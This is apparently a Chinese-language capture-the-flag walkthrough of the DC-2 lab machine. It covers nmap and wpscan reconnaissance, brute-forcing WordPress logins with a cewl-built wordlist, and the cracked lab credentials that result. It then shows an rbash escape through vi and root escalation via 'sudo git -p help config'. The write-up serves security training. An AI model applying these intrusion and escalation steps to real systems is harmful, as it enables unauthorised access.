DC:2
文章目录
信息收集
IP收集
使用arp-scan 对网段进行扫描
得到目标机ip之后使用nmap -A -p- -sV -sT 10.4.7.21对该ip进行详细扫描
可以看到该目标机开放着ssh和http服务得到端口7744和80
网页收集
访问网页发现无法访问
应该是被重定向到了dc-2这个域名我们做个域名绑定修改本地hosts文件C:\Windows\System32\drivers\etc\hosts
在最后一行加入10.4.7.21 dc-2
再次访问网站发现访问成功了
根据指纹发现是wordpress cms内容管理系统 直接用wpscan进行扫描
用wpscan工具进行扫描 wpscan --url http://dc-2 --enumerate u --api-token 后面为token可以在wpscan官网获取
扫描之后得到三个用户名admin,jerry,tom
我们将他们收集成用户名字典或许一会可以用到
往上翻看扫描出来的信息发现一个网址
访问这个网址http://dc-2/index.php/comments/feed/
在这个网址里又发现一个网址继续访问是一个留言板一样的界面
继续翻找信息在flag页面中发现提示用cewl进行网页爬取密码
进行密码爬取cewl -d 3 http://dc-2/ >passwd.txt -d是深度
既然我们拥有用户名字典和密码字典我们进行一个爆破
wpscan自带爆破功能wpscan --url http://dc-2 -U account.txt -P passwd.txt
进行爆破爆破出来两对密码
jerry / adipiscing
tom / parturient
我们尝试进行登录
我们用jerry成功登录进来了
在页面里找到了flag2
没有什么可以利用的信息
尝试上传文件
发现上传不了登录tom的账号试试
rbash绕过
还是没有线索用已知账号密码尝试ssh登录
jerry密码错误尝试tom
成功登录
输入whoami发现被rbash限制
进行rbash逃逸试了很多方法最后在vi命令里的末行模式使用set shell=/bin/sh
然后再次调用末行模式输入shell就解除rbash限制了
出来之后发现已经不是rbash但是命令还是不能用
我们设置环境变量export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin发现命令就可以用了
提权
尝试sudo提权发现这个用户不能用sudo
用find的命令查找二进制文件/usr/bin$ find / -perm -u=s -type f 2>/dev/null
很明显没有利用的文件
搜索漏洞库也没有漏洞
找找文件里面也没有什么线索
看见可以用su 尝试切换jerry用户
登进来了可能是限制了jerry用户的远程登录
使用sudo -l 发现可以用root身份执行git
直接git提权sudo git -p help config
!/bin/sh
获得flag
